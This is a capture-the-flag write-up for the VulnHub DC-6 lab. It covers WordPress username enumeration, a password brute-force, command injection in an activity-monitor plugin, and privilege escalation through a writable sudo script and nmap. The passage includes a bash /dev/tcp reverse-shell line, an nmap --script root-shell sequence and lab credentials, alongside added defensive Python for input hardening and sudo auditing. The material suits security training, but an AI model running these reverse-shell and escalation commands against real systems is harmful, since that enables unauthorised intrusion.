VulnHub: DC-6 Writeup

DC-6 starts off by enumerating usernames from a WordPress website. I’m able to gain a set of credentials to log into the admin panel with a brute-force attack. There is a WP plugin which can be leveraged to gain a foothold on the system. A to-do note containing a user’s credentials is discovered while enumerating the home directory. For the root part, there are sudo privileges on a writable backup script and on nmap, which allow me to escalate to another user and then straight to root.


Because and are virtual gateway addresses, the target machine’s IP address is most likely

arp-scan --interface eth0 '' | tee scans/00-arp-scan-dc6

The initial nmap scan shows two open ports: SSH on port 22 and an Apache web server on port 80.

nmap -n -sC -sV -oA scans/10-initial-dc6 '' -v
Nmap scan

From the results above, port 80 redirects to http://wordy/. To resolve that hostname, I’ll add wordy to my /etc/hosts file.

echo '   wordy' >> /etc/hosts

This page clearly states that it’s a WordPress site.

Wordy homepage

Nothing interesting to explore here, but the phrase “secure plugins” seems to be a hint from the machine’s author.

Running the nmap http-wordpress scripts against this website finds several usernames.

nmap -p 80 --script "http-wordpress*" wordy
Nmap WordPress script

I’ll save those usernames into a file called users.

wpscan identifies two vulnerable WP plugins: one with an RCE and one with a user-role privilege escalation.

wpscan --url http://wordy/ --enumerate vp --plugins-detection aggressive --api-token your_token123

I’m interested in the RCE one, but before that I’ll have to find creds.

At that time, I was stuck for a couple of hours. I asked for a nudge and the answer was to brute force; I didn’t know that the box’s author had actually given us a hint to create a custom wordlist from rockyou.txt.


I’ll create a new wordlist from rockyou.txt and then use it to perform a brute-force attack with wpscan.

wpscan --url http://wordy/ --usernames users --passwords passwords.txt

It returns one valid credential pair: mark:helpdesk10.

Valid login


With the credentials I obtained, I can log into the WP Dashboard.

WP Dashboard

From the previous wpscan result, I searched for an exploit PoC for the Plainview Activity Monitor RCE and found one on exploit-db.

The PoC exploits a vulnerability in the plugin’s IP tools feature.

IP Lookup

I’ll hit the lookup button and intercept the request on Burp.

RCE can be achieved by appending OS commands after a pipe |, a semicolon ; (stacked command), or a logical OR || in the ip parameter. In this case, I send a reverse shell.

Reverse shell
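The injection works because the ip parameter ends up inside a shell command line. As an added illustration (not the plugin’s code and not part of this writeup), here is that weak pattern next to a hardened version: a parameter concatenated into a shell string, versus strict IP parsing plus an argv list executed without a shell. The dig command line, the function names and the sample inputs are assumptions made for the example.

```python
"""Added example (not from the writeup or the plugin): the command-injection
pattern behind an 'IP lookup' feature, beside a hardened version.

The dig command line and the build_lookup_* names are assumptions for
illustration; nothing here is the plugin's own code."""
import ipaddress
import re
import subprocess

# Constructed inputs: a normal address, and the shapes the writeup describes
# (OS commands appended after |, ; or || in the ip field).
BENIGN_INPUT = "10.0.0.5"
INJECTED_INPUTS = ["10.0.0.5; id", "10.0.0.5 | id", "10.0.0.5 || id"]

# Characters a POSIX shell would interpret as command separators/substitution.
SHELL_METACHARS = re.compile(r"[;|&`$<>\n]")


def build_lookup_vulnerable(ip: str) -> str:
    """Weak pattern: the request parameter is concatenated into a shell string
    (the equivalent of shell_exec("dig -x " . $ip) in PHP). Returned, not run."""
    return "dig -x " + ip


def build_lookup_hardened(ip: str) -> list[str]:
    """Parse the parameter as an IP address (anything else is rejected) and
    build an argv list, which run_lookup executes without a shell."""
    try:
        addr = ipaddress.ip_address(ip.strip())
    except ValueError as exc:
        raise ValueError(f"rejected non-IP value: {ip!r}") from exc
    return ["dig", "-x", str(addr)]


def metachars_in(cmd: str) -> list[str]:
    """Shell metacharacters present in a built command line; for the
    vulnerable builder this is exactly what the shell would act on."""
    return SHELL_METACHARS.findall(cmd)


def accepted(ip: str) -> bool:
    """True if the hardened builder accepts this value."""
    try:
        build_lookup_hardened(ip)
        return True
    except ValueError:
        return False


def run_lookup(ip: str) -> str:
    """Execute the hardened command with subprocess and no shell, so even a
    value that slipped past validation could not start a second command."""
    argv = build_lookup_hardened(ip)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return proc.stdout


if __name__ == "__main__":
    for value in [BENIGN_INPUT, *INJECTED_INPUTS]:
        cmd = build_lookup_vulnerable(value)
        print(f"vulnerable: {cmd!r:28} metachars={metachars_in(cmd)}")
        print(f"hardened:   accepted={accepted(value)}")
```

The two defences are independent: validation rejects anything that is not a literal address, and the argv form removes the shell entirely, so a future validation mistake still cannot become command execution.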

Privilege Escalation

The home directory is readable by www-data and there are two interesting files: and things-to-do.txt.

Interesting files

I immediately checked the contents of and things-to-do.txt.

The script is writable by group devs, and I’ll note that.

Contents of

And this things-to-do.txt contains graham’s credentials.

Contents of things-to-do.txt

I tried graham’s creds, graham:GSo7isUM1D4, on SSH, and it worked.

SSH graham

User graham has sudo privileges on the script, and this allows me to run the script as user jens.

Sudo privileges on

Because the script is also writable by graham (devs group), I can exploit this to escalate to jens by appending a reverse shell line to the script and then running it with sudo.

graham@dc-6:~$ echo 'bash -i >& /dev/tcp/ 0>&1' >> /home/jens/
Escalate to jens

I found out that user jens is allowed to execute nmap as root user.

Sudo privileges on nmap

I can exploit this using the reference from GTFOBins.

jens@dc-6:/home/graham$ TF=$(mktemp)
jens@dc-6:/home/graham$ echo 'os.execute("/bin/sh")' > $TF
jens@dc-6:/home/graham$ sudo nmap --script=$TF
Escalate to root
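Both sudo findings above (a script run as jens that graham’s group can write, and nmap runnable as root with a script argument) are the same class of misconfiguration, and both are easy to catch before an attacker does. As an added example that is not part of the writeup, here is a small Python audit over sudo rules: it flags a target that the invoking user can modify, and a target known to execute arbitrary code. The uid/gid values, the rule list and the script name are constructed (the writeup’s script path is elided, so a placeholder is used), and /usr/bin/nmap is an assumed path.

```python
"""Added example (not from the writeup): checks a defender can run over sudo
rules to catch the two DC-6 misconfigurations. Paths, uids, gids and the
rule list are constructed for illustration."""
import os
import stat
from dataclasses import dataclass


@dataclass
class SudoRule:
    """Minimal model of a sudoers entry: who may run what, as whom."""
    user: str
    run_as: str
    command: str  # absolute path of the target, first token only


# Targets whose normal options execute arbitrary code (nmap --script is the
# one used in the writeup). Keep this list short and reviewed; not exhaustive.
SHELL_CAPABLE = {"/usr/bin/nmap", "/bin/bash", "/bin/sh"}


def writable_by(mode: int, owner_uid: int, owner_gid: int, uid: int, gids) -> bool:
    """Can a user with (uid, gids) write a file with this mode/owner/group?
    A pure function over the stat fields so it can be tested without root."""
    if uid == 0:
        return True
    if owner_uid == uid and mode & stat.S_IWUSR:
        return True
    if owner_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def audit_rule(rule, mode, owner_uid, owner_gid, uid, gids) -> list[str]:
    """Findings for one rule given the target's stat fields and the invoking
    user's uid and group set."""
    findings = []
    if rule.run_as != rule.user and writable_by(mode, owner_uid, owner_gid, uid, gids):
        findings.append(f"{rule.command}: writable by {rule.user}, runs as {rule.run_as}")
    if rule.command in SHELL_CAPABLE:
        findings.append(f"{rule.command}: can execute arbitrary code as {rule.run_as}")
    return findings


def audit_path(rule, uid, gids) -> list[str]:
    """Same check against a real file on disk (used on a live host)."""
    st = os.stat(rule.command)
    return audit_rule(rule, st.st_mode, st.st_uid, st.st_gid, uid, gids)


# Constructed scenario mirroring the writeup: graham (uid 1001, member of
# devs, gid 1004) may run as jens (uid 1002) a script that group devs can
# write; jens may run nmap as root. Numbers are made up for the example.
DEVS_GID = 1004
GRAHAM = (1001, {1001, DEVS_GID})
JENS = (1002, {1002, DEVS_GID})
BACKUP_SCRIPT = "/home/jens/PLACEHOLDER-backup-script.sh"  # real name elided
RULES = [SudoRule("graham", "jens", BACKUP_SCRIPT),
         SudoRule("jens", "root", "/usr/bin/nmap")]
SCRIPT_MODE = 0o100775  # -rwxrwxr-x, group devs
NMAP_MODE = 0o100755    # -rwxr-xr-x, root:root


def audit_constructed_scenario() -> list[str]:
    """Run both rules against the constructed stat data."""
    findings = []
    findings += audit_rule(RULES[0], SCRIPT_MODE, JENS[0], DEVS_GID, *GRAHAM)
    findings += audit_rule(RULES[1], NMAP_MODE, 0, 0, *JENS)
    return findings


if __name__ == "__main__":
    for line in audit_constructed_scenario():
        print("FINDING:", line)
```

On a real host, pair audit_path with the parsed output of sudo -l for each account; the writable-target check should also walk the parent directories, since a writable directory lets the file be replaced even when the file itself is not writable.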

And here is the flag:

Root flag of DC-6

Originally published at:
